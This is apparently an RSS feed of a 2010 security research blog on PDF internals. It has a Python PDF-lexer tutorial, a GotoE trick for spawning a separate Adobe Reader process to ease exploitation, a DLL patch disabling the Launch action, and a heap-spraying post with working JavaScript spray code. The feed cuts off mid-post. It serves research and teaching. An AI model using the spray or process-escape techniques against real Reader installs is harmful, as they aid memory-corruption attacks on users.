LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12540)
LexToken(ENDOBJ,'endobj',1,12543)
LexToken(XREF,[((0, 29), [(0, 65535, 'f'),...(17744, 0, 'n')])],1,12550)
LexToken(TRAILER,'trailer',1,13140)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,13263)
LexToken(STARTXREF,17942,1,13266)
LexToken(EOF,'%%EOF\n',1,13282)
</div></pre>
<p>It marks the position of every object!!! WOW!!!!!!</p>
<p><span id="more-367"></span></p>
<h1>Character sets</h1>
<p>The PDF character set is divided into three classes, called regular, delimiter, and white-space characters. This classification determines the grouping of characters into tokens. The rules defined in this sub-clause apply to all characters in the file except within strings.</p>
<p>The white spaces &#8230; </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
white_spaces_r = r"\x20\r\n\t\x0c\x00"
white_spaces = "\x20\r\n\t\x0c\x00"
</div></pre>
<p>And the delimiter characters (, ), , [, ], {, }, /, and % &#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
delimiters = r"()[]/%" #This is odd: {} ?
delimiters_r = r"()\[\]/%" #This is odd: {} ?
</div></pre>
<p>As the first appearing hack we have that the CARRIAGE RETURN (0Dh) and LINE FEED (0Ah) characters, also called newline characters, shall be treated as end-of-line (EOL) markers. The  combination of a CARRIAGE RETURN followed immediately by a LINE FEED shall be treated as one EOL marker.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
eol = r'(\r|\n|\r\n)'
</div></pre>
<h1> Boolean Objects </h1>
<p>Boolean objects represent the logical values of true and false. They appear in PDF files using the keywords true and false.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_TRUE = "true"
t_FALSE = "false"
</div></pre>
<h1>  Literal Strings</h1>
<p>A literal string shall be written as an arbitrary number of characters enclosed in parentheses. Any characters may appear in a string except unbalanced parentheses and the backslash, which shall be treated specially as described in this sub-clause. Balanced pairs of parentheses within a string require no special treatment.</p>
<blockquote><p>
EXAMPLE 1        The following are valid literal strings:<br />
                 ( This is a string )<br />
                 ( Strings may contain newlines<br />
                 and such . )<br />
                 ( Strings may contain balanced parentheses ( ) and<br />
                 special characters ( * ! &amp; } ^ % and so on ) . )<br />
                 ( The following is an empty string . )<br />
                 ()<br />
                 ( It has zero ( 0 ) length . )
</p></blockquote>
<p>Parsing this is INSANE! A string lexer should keep going until every parenthesis is balanced. So  we need to keep track of the number of  parenthesis we have consumed. For that we use different lexer states. But firs let see how we start scanning one of this thins&#8230; that is with a LEFT_PARENTHESIS:</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_string_LEFT_PARENTHESIS(t):
    r"\("
    t.lexer.push_state('string')
    t.lexer.string += "("
</div></pre>
<p>Any normal char we just consume and add it to the string accumulator&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_string_LITERAL_STRING_CHAR(t):
    r'.'
    t.lexer.string += t.value
</div></pre>
<p>Any ESCAPED character inside a string, like an octal encoded char or \r, \n, \t, \b, \f, or \\ is lexed like this&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'\\([nrtbf()\\]|[0-7]{1,3}|'+eol+')')    
def t_string_ESCAPED_SEQUENCE(t):
    val = t.value[1:]
    if val[0] in '0123':
        value = chr(int(val,8)) 
    elif val[0] in '4567':
        value = chr(int(val[:2],8)) + val[3:]
    else:   
        value = { "\n": "", "\r": "", "n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "(": "(", ")": ")", "\\": "\\" }[val[0]]
    t.lexer.string += value
</div></pre>
<p>ALSO the newlines inside strings are treated differently. An end-of-line marker appearing within a literal string without a preceding REVERSE SOLIDUS shall be treated as a byte value of (0Ah), irrespective of whether the end-of-line marker was a CARRIAGE RETURN (0Dh), a LINE FEED (0Ah), or both.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(eol)
def t_string_LITERAL_STRING_EOL(t):
    t.lexer.string += "\x0A"
</div></pre>
<p>And lastly the lexer state stacking thing that deals with the parenthesis balancing insanity.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_string_LEFT_PARENTHESIS(t):
    r"\("
    t.lexer.push_state('string')
    t.lexer.string += "("
    
def t_string_RIGHT_PARENTHESIS(t):
    r"\)"
    t.lexer.pop_state()
    if t.lexer.current_state() == 'string':
        t.lexer.string += ")"
    else:
        t.type  = "STRING"
        t.value = t.lexer.string
        return t
</div></pre>
<h1>Hexadecimal Strings </h1>
<p>Strings may also be written in hexadecimal form, which is useful for including arbitrary binary data in a PDF file.A hexadecimal string shall be written as a sequence of hexadecimal digits (0-9 and either A-F or a-f) encoded as ASCII characters and enclosed within angle brackets .</p>
<blockquote><p>
EXAMPLE 1
</p></blockquote>
<p>Each pair of hexadecimal digits defines one byte of the string. White-space characters shall be ignored. If the final digit of a hexadecimal string is missing -that is, if there is an odd number of digits- the final digit shall be assumed to be 0.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'')
def t_HEXSTRING(t):
    t.value =  ''.join([c for c in t.value if c not in white_spaces+""])
    t.value =  (t.value+('0'*(len(t.value)%2))).decode('hex')
    return t
</div></pre>
<h1>Name objects</h1>
<p>Beginning with PDF 1.2 a name object is an atomic symbol uniquely defined by a sequence of any characters (8-bit values) except null (character code 0). PDF names are basically everything starting with a &#8220;/&#8221; and ending with some delimiter. In any case we need a different lexer state to handle this.</p>
<p>It starts wit a SOLIDUS:</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_NAME(t):
    r'/'
    t.lexer.push_state('name')    
    t.lexer.name = ""
    t.lexer.start = t.lexpos
</div></pre>
<p>Any character in a name that is a regular character (other than NUMBER SIGN) shall be written as itself or by using its 2-digit hexadecimal code, preceded by the NUMBER SIGN.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_name_HEXCHAR(t):
    r'\#[0-9a-fA-F]{2}'
    assert t.value != "#00"
    t.lexer.name += t.value[1:].decode('hex')
</div></pre>
<p>Any &#8220;normal character&#8221;  (not a delimiter, nor a whitespace) is consumed directly&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'[^'+white_spaces_r+delimiters_r+']')
def t_name_NAMECHAR(t):
    t.lexer.name += t.value
</div></pre>
<p>And it ends a return the token otherwise&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'['+white_spaces_r+delimiters_r+']')
def t_name_WHITESPACE(t):
    global stream_len
    t.lexer.pop_state()
    t.lexer.lexpos -= 1
    t.lexpos = t.lexer.start
    t.type  = "NAME"
    t.value = t.lexer.name
    t.lexer.name=""
    return t
</div></pre>
<h1>Array Objects</h1>
<p>An array shall be written as a sequence of objects enclosed in [ and ].</p>
<blockquote><p>
 [ 549 3.14 false ( Ralph ) /SomeName ]
</p></blockquote>
<p>At last something fairly simple! We just need to scan for this&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_LEFT_SQUARE_BRACKET = r"\["
t_RIGHT_SQUARE_BRACKET = r"\]"
</div></pre>
<h1>Dictionary Objects</h1>
<p>A dictionary shall be written as a sequence of key-value pairs enclosed in double angle brackets (&lt;&gt;)</p>
<p>Again simple thing..</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_DOUBLE_LESS_THAN_SIGN = r'&lt;&lt;&#039;
</div></pre>
<h1>  Stream Objects</h1>
<p>A stream object, like a string object, is a sequence of bytes. A stream  shall consist of a dictionary followed by zero or more bytes bracketed between the keywords stream(followed by newline) and endstream.<br />
Note that the keyword &#8220;endstream&#8221; may appear in the middle of a stream making it impossible to scan. For that reason the stream dictionary MUST have a \Length key in it to disambiguate the length (and in some cases accelerate the scan) of the following stream.</p>
<p>By now we do not take the Length key in consideration and scan until we found the next &#8220;endstream&#8221;. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_STREAM_DATA(t):
    r'stream(\r\n|\n)'
    found = t.lexer.lexdata.find('endstream',t.lexer.lexpos)
    stream_len = None
    
    if found != -1:
        chop = 0

        if t.lexer.lexdata[found-3] == '\r':
            chop = {'\r':1, '\n':2}[t.lexer.lexdata[found-2]]
        elif t.lexer.lexdata[found-2] in ['\n','\r']:
            chop = 1
        else:
            #TODO log errors
            pass
        t.value = t.lexer.lexdata[t.lexer.lexpos: found -1 - chop]
        t.lexer.lexpos = found + 9
        t.type  = "STREAM_DATA"
    else:
        raise Exception("Error:Parsing:Lexer: COuld not found endstream string.")
    return t
</div></pre>
<h1>Indirect Objects</h1>
<p>Any object in a PDF file may be labeled as an indirect object.The definition of an indirect object in a PDF file shall consist of its object number and generation number(separated by white space), followed by the value of the object bracketed between the keywords  obj and endobj.<br />
The &#8220;obj N M &#8221; keyword&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_OBJ(t):
    r'\d+\x20\d+\x20obj' #[0-9]{1,10} [0-9]+ obj'
    t.value = tuple(t.value.split("\x20")[:2])
    return t
</div></pre>
<p>and the endboj&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_ENDOBJ = r'endobj'
</div></pre>
<p>The object may be referred to from elsewhere in the file by an indirect reference. Such indirect references shall consist of the object number, the generation number, and the keyword R (with white space separating each<br />
part):</p>
<blockquote><p>
12 0 R
</p></blockquote>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_R(t):
    r'\d+\x20\d+\x20R'
    t.value = tuple([int(x,10) for x in t.value.split("\x20")[:2] ])
    return t
</div></pre>
<p>The null object has a type and value that are unequal to those of any other object. There shall be only one object of type null, denoted by the keyword null. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_NULL = r'null'
</div></pre>
</h1>
<p>Numeric Objects</h1>
<blockquote><p> 34.5 -3.62 +123.6 4. -.002 0.0 123 43445 +17 -98 0 </p></blockquote>
<p>PDF provides two types of numeric objects: integer and real. Integer objects represent mathematical integers. Real objects represent mathematical real numbers. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_NUMBER(t):
    r'[+-]{0,1}(\d*\.\d+|\d+\.\d*|\d+)' 
    return t
</div></pre>
<h1>File Header</h1>
<p>The first line of a PDF file shall be a header consisting of the 5 characters %PDF- followed by a version number of the form 1.N, where N is a digit between 0 and 7.</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_HEADER(t):
    r'%PDF-1\.[0-7]'
    t.value = t.value[-3:]
    return t
</div></pre>
<h1>Cross-Reference Table</h1>
<p>Nowadays it seems that every &#8220;good&#8221; PDF out there is using eventually compressed crossreferences streams, but still the following is the most simple cross referencing way described in the spec. Each cross-reference section shall begin with a line containing the keyword xref. </p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
@TOKEN(r'xref[' + white_spaces_r +']*'+eol)
def t_XREF(t):
    t.lexer.push_state('xref')    
    t.lexer.xref = []
    t.lexer.xref_start = t.lexpos
</div></pre>
<p>Following this line shall be one or more cross-reference subsections, which may appear in any order.<br />
@TOKEN(r&#8217;[0-9]+[ ][0-9]+[' + white_spaces_r +']*&#8217;+eol)</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_xref_SUBXREF(t):
    n = t.value.split(" ")
    t.lexer.xref.append(((int(n[0],10),int(n[1],10)),[]))
    
def t_xref_XREFENTRY(t):
    r'\d{10}[ ]\d{5}[ ][nf](\x20\x0D|\x20\x0A|\x0D\x0A)'
    n = t.value.strip().split(" ")
    t.lexer.xref[len(t.lexer.xref)-1][1].append((int(n[0],10), int(n[1],10), n[2]))
</div></pre>
<p>Anything that do not match the last 3 rules is a get-out-of-here indicator&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
def t_xref_out(t):
    r'.'
    t.lexer.pop_state()  
    t.type = 'XREF'
    t.value = t.lexer.xref
    t.lexer.lexpos -= 1
    t.lexpos=t.lexer.xref_start
    return t
</div></pre>
<h1>   File Trailer</h1>
<p>The trailer of a PDF file enables a conforming reader to quickly find the cross-reference table and certain special objects. Conforming readers  should read a PDF file from its end. The last line of the file shall contain only the end-of-file marker, %%EOF. The two preceding lines shall contain,  one per line and in order, the keyword startxref and the byte offset in the decoded stream from the beginning of the file to the beginning of the xref  keyword in the last cross-reference section. The startxref line shall be preceded by the trailer dictionary, consisting of the keyword trailer followed by a series of key-value pairs enclosed in double anglebrackets (&lt;&gt;).<br />
Thus, the trailer has the following overall structure:</p>
<blockquote>
<p>       trailer<br />
           &lt;&gt;<br />
       startxref<br />
       Byte_offset_of_last_cross-reference_section<br />
       %%EOF
</p></blockquote>
<p>So we just need to add this 3 last tokens&#8230;</p>
<pre><div style="border:1px solid gray;background:#ffffb3 none repeat scroll 0 0;color:#008099;margin:10px;padding:10px;">
t_TRAILER = r'trailer'

@TOKEN(r'startxref'+ '['+white_spaces_r+']+[0-9]+')
def t_STARTXREF(t):
    t.value = int(t.value[10:],10)
    return t

t_EOF = r'%%EOF'
</div></pre>
<p>Ok&#8230; that&#8217;s pretty much it. Bored? Well I am.<br />
Where to go from here?<br />
The bar?<br />
Or the parser?</p>
<p>f/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/367/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/367/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=367&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>
	</item>
		<item>
		<title>See you in the Adobe playground…</title>
		<link>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/</link>
		<comments>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/#comments</comments>
		<pubDate>Wed, 16 Jun 2010 21:52:51 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[protections bypass]]></category>
		<category><![CDATA[sandbox]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=321</guid>
		<description><![CDATA[Wacharooga!! Let&#8217;s see how to run an external Adobe Reader process from a pdf file that&#8217;s being displayed in a web browser. This *technique* is a derivate of the pdf-into-pdf embedding post. It also uses the GotoE action to jump away to an embed pdf. I just discovered that doing this from a browser viewed [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=321&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Wacharooga!!<br />
Let&#8217;s see how to run an external Adobe Reader process from a pdf file that&#8217;s being displayed in a web browser.<br />
This *technique* is a derivate of the pdf-into-pdf embedding <a href="http://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/">post</a>. It also uses the GotoE action to jump away to an embed pdf. I just discovered that doing this from a browser viewed pdf it runs a different process of the Adobe Reader. The ability of running a new, fresh and separated process has some interesting exploitability implications.<br />
In older Reader version (previous to 9.2.3?) doing this also served as a way to bypass DEP optIn, but by now we have to settle with just this two facts:<br />
<a href="http://feliam.files.wordpress.com/2010/06/browsertoreader.png"><img src="http://feliam.files.wordpress.com/2010/06/browsertoreader.png?w=250&#038;h=175" alt="" title="browserToReader" class="alignright size-medium wp-image-340" height="175" width="250"></a><br />
[+] Whatever happens in the separate Reader will not crash the browser, potentially enabling other chances to exploit it.</p>
<p>[+] It makes it possible to develop exploits for highly predictable memory layouts.</p>
</p>
<p><span id="more-321"></span></p>
<p>We already posted <a href="http://feliam.wordpress.com/2010/01/13/generic-pdf-exploit-hider-embedpdf-py-and-goodbye-av-detection-012010/">here</a> a step by step howto programatically embed a pdf file into another one, and also how to jump into the embed one. In that case the goal was prove there was a way to hide the nature of a malicious pdf into a better looking one.</p>
<p>Basically the GotoE pdf action documentation describes a way to open or jump to a pdf in another window. That&#8217;s accomplished crafting the NewWindow flag accordingly(setting it to true!). Check out how a new window opening GotoE action will look like..</p>
<pre style="border:2px solid red;background:none repeat scroll 0 0 rgb(255,255,181);color:rgb(0,144,153);margin:10px;padding:10px;">  /S /GoToE
  /T &lt;&lt;/N (embedfile.pdf)
       /R /C
       /NewWindow false
     &gt;&gt;
  /NewWindow false
&gt;&gt;

</pre>
<p> We&#8217;ve embed <a href="http://feliam.files.wordpress.com/2010/06/mini.pdf">this</a> minimal pdf file into a pdf shell that will jump to it, <a href="http://feliam.files.wordpress.com/2010/06/escapethebrowsermini.pdf">escapeTheBrowserMini</a>.  When you try that from a standalone reader it will open different window or tab depending on the Reader version, but in any case share the same process due to the magic of some IPC, but when run from a simple click in a web browser it will, for some reason, be forced to open the target pdf in a different Adobe Reader process. (tested in IE8/Opera/Chrome/FF+ADBE9.3.2)</p>
<p>That was great!<br />
But Hey! This crash my browser!!</p>
<p>If you jump to a crashing pdf yes. And as we were filtring with the possibility of preventing the whole web browser to crash along with Abobe in the case of a bad pdf, we need to keep going a little more&#8230;<br />
Surprisingly Abobe does some parsing on the father instance every time it jumps to an embedded pdf, so the browser will crash if we jump away to a crashing pdf.  But this situation will not go so deep. If you jump to a pdf that jumps again to a third one the web browser grandfather will not be affected.</p>
<p>We control whether to jump to a pdf in a different window or if it replaces the current one with the embed pdf. Using that we can arrange a couple of nested GotoE and pdfs so a single separate window is opened. A behavior like that may be emulated making it jump from the web browser to a pdf shell in a separate NewWindow where it jumps again, this time replacing the current PDF in the same window. A minitool to do this is pasted <a href="http://pastebin.com/ZWxqrFBT">here</a> and also <a href="http://sites.google.com/site/felipeandresmanzano/escapeTheBrowser.py">here</a>.</p>
<p>Test it hard and check out <a href="http://feliam.files.wordpress.com/2010/06/escapethebrowser.pdf">this</a> 100 windows pdf! WRAAAAH!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/321/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/321/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=321&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/06/16/see-you-in-the-adobe-playground/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/06/browsertoreader.png?w=300" medium="image">
			<media:title type="html">browserToReader</media:title>
		</media:content>
	</item>
		<item>
		<title>Launch PDF Action Mega Abuse !PATCH!</title>
		<link>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/</link>
		<comments>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/#comments</comments>
		<pubDate>Wed, 31 Mar 2010 07:09:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Launch]]></category>
		<category><![CDATA[patch]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/</guid>
		<description><![CDATA[@DidierStevens has released a way to partially &#8220;control&#8221; the message showed by Adobe Reader when it launches an application from inside a pdf file with the PDFAction &#8220;/Launch&#8221;. Check it out here I think it&#8217;s about time to start calling the application Launching capability of Adobe (and friends) a VULNERABILITY. Here you have a python [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=303&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>@DidierStevens has released a way to partially &#8220;control&#8221; the message showed by Adobe Reader when it launches an application from inside a pdf file with the PDFAction &#8220;/Launch&#8221;. Check it out <a href="http://blog.didierstevens.com/2010/03/29/escape-from-pdf">here</a></p>
<p>I think it&#8217;s about time to start calling the application Launching capability of Adobe (and friends) a VULNERABILITY.</p>
<p><a href="http://pastebin.com/fjWznc3j">Here</a> you have a python script for PATCHING the affected dll and cripple the Launch Action. </p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,205,109);color:rgb(0,128,153);margin:10px;padding:10px;">
<pre>
#Megapatch for Didier Launch action abuse
#http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

version="9.0"
path = "C:\\Program Files\\Adobe\\Adobe Reader %s\\Reader\\"%version
#path = "./"

data = file(path+"AcroRd32.dll","rb").read()
file(path+"AcroRd32.dll.bak","wb").write(data)
while data.find("Launch")!=-1:
	data = data.replace("Launch","Felipe")
file(path+"AcroRd32.dll","wb").write(data)

</pre>
</div>
<p>I tested it in W7 / Adobe Reader 9.3 but it should work for every version/OS/Arch mixture. In some OS you may experience some trouble replacing the dll.</p>
<p>(((( An untested improvement&#8230;  s/Felipe/######/g ))))</p>
<p>Felipe/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/303/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/303/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=303&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/03/31/launch-pdf-action-mega-abuse/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>
	</item>
		<item>
		<title>Filling Adobe’s heap …</title>
		<link>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/</link>
		<comments>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 23:11:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[actionscript]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[heap spray]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[memory]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=162</guid>
		<description><![CDATA[This post is about how to fill the Adobe Readers Heap. We&#8217;ll summarize and put in practice 3 ways of filling Adobe Reader memory. The idea is that when Adobe finnish parsing our PDF we could be pretty sure that at some fixed address there will be controled data. We&#8217;re not going to do any [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=162&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<div style="position:fixed;">
<div style="position:relative;left:-3em;">
<a href="http://www.twitter.com/feliam"><img src="http://feliam.files.wordpress.com/2010/09/t_small-b.png?w=460" alt="Follow feliam on Twitter" /></a>
</div>
</div>
<table>
<tbody>
<tr>
<td>This post is about how to fill the Adobe Readers Heap. We&#8217;ll summarize and put in practice 3 ways of filling Adobe Reader memory. The idea is that when Adobe finnish parsing our PDF we could be pretty sure that at some fixed address there will be controled data. We&#8217;re not going to do any fancy feng-shui or heap massage, the idea of this is just to show 3 practical known ways for filling the Reader process memory. Can we fill it? </td>
<td><a href="http://feliam.files.wordpress.com/2010/02/heapdraw1.png"><img class="alignnone size-medium wp-image-277" title="heapdraw" src="http://feliam.files.wordpress.com/2010/02/heapdraw1.png?w=180&#038;h=156" alt="" height="156" width="180"></a></td>
</tr>
</tbody>
</table>
<p><span id="more-162"></span></p>
<div style="font-style:italic;background:none repeat scroll 0 0 rgb(251,223,223);margin:20px;padding:20px;"><img alt=""> &#8221;&#8217;In <a title="Computer security" href="http://en.wikipedia.org/wiki/Computer_security">computer security</a>, <strong>heap spraying</strong> is  a technique used in <a title="Exploit (computer security)" href="http://en.wikipedia.org/wiki/Exploit_%28computer_security%29">exploits</a> to facilitate <a title="Arbitrary code execution" href="http://en.wikipedia.org/wiki/Arbitrary_code_execution">arbitrary code execution</a>. In general, code  that <em>sprays the heap</em> attempts to put a certain sequence of bytes  at a predetermined location in the <a title="Random  access memory" href="http://en.wikipedia.org/wiki/Random_access_memory">memory</a> of a target <a title="Process (computing)" href="http://en.wikipedia.org/wiki/Process_%28computing%29">process</a> by having it allocate (large)  blocks on the process&#8217; <a title="Heap  (programming)" href="http://en.wikipedia.org/wiki/Heap_%28programming%29">heap</a> and fill the bytes in these  blocks with the right values. They commonly take advantage from the fact  that these heap blocks will roughly be in the same location every time  the heap spray is run. &#8221;&#8217;</div>
<p>The basic idea is to make the target process allocate BIG chunks of memory forcing the underlying memory allocator to align those at some 0&#215;1000 border. There is <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">ASLR</a> and you can&#8217;t predict where a freshly allocated chunk of memory is going to be. But if the amount of asked memory is big enough, when allocated, it will be aligned at some 0&#215;1000 border in most OSs. An allocation size of 0&#215;100000 bytes works in XP and linux2.6.32  (32bits). Probably this will continue to be this way for a long time due to memory usage performance reasons. Think embedded!</p>
<div style="font-family:monospace;margin:10px;padding:10px;">
<p>Objective: Have some degree of certainty about what&#8217;s on a fixed memory address.</p>
<p>Needs:<br />
a) Big allocations should be aligned to some 0&#215;1000 byte border.<br />
b) Being able to do a lot of big allocations programatically.<br />
c) Controlling what&#8217;s inside our big allocations.</p>
</div>
<p>Wikipedia says that there are 3 ways of implementing a heap spray: Javascript, ActionScript, and Images. So we&#8217;ll honor those 3:</p>
<h2>The JS way</h2>
<p>This is the most popular and most used way to play with memory allocations programatically. There are a lot of research and practical examples about this. I personally have started from <a href="http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf">here</a>. We are targeting PDFs so it has one BIG drawback: you need to have Javascript interpreter on the target process. Interestingly Adobe Reader supports JS heap spraying.</p>
<p>The following JS code will construct a 0&#215;100000 bytes long memory chunk made out of the concatenation of several %%minichunk%%. And then copy 300 times those 0&#215;100000 bytes long chunk to 300 different newly allocated memory.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,255,179);color:rgb(0,128,153);margin:10px;padding:10px;">
<pre>var slide_size=0x100000;
var size = 300;
var x = new Array(size);
var chunk = %%minichunk%%;

while (chunk.length &lt;= slide_size/2)
    chunk += chunk;

for (i=0; i &lt; size; i+=1) {
    id = &quot;&quot;+i;
    x[i]= chunk.substring(4,slide_size/2-id.length-20)+id;
}
</pre>
</div>
<p>That %%minichunk%% is a place holder that is going to be filled by the python that will generate the PDF file. If we made that %%minichunk%% of exactly 0&#215;1000 bytes of controled data, any 0&#215;1000 aligned byte inside the big chunk will have the first byte of the minichunk. Now as we&#8217;ll put 300 times the big chunk we could speculate where the OS will put at least one of those.</p>
<p>Ok let&#8217;s try it! we&#8217;ll modify a little bit the python from <a href="http://feliam.wordpress.com/2010/01/12/reinventing-the-wheel-again-putting-js-in-a-pdf-with-minipdf-py/">here</a> so it contains the spraying JS. The new python file looks like <a href="http://pastebin.com/f1f7fa4c8">this</a>.</p>
<p>Let&#8217;s create the pdf:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">python JSSpray.py  &gt;JSSpray.pdf</div>
<p>and try it with Adobe Reader:</p>
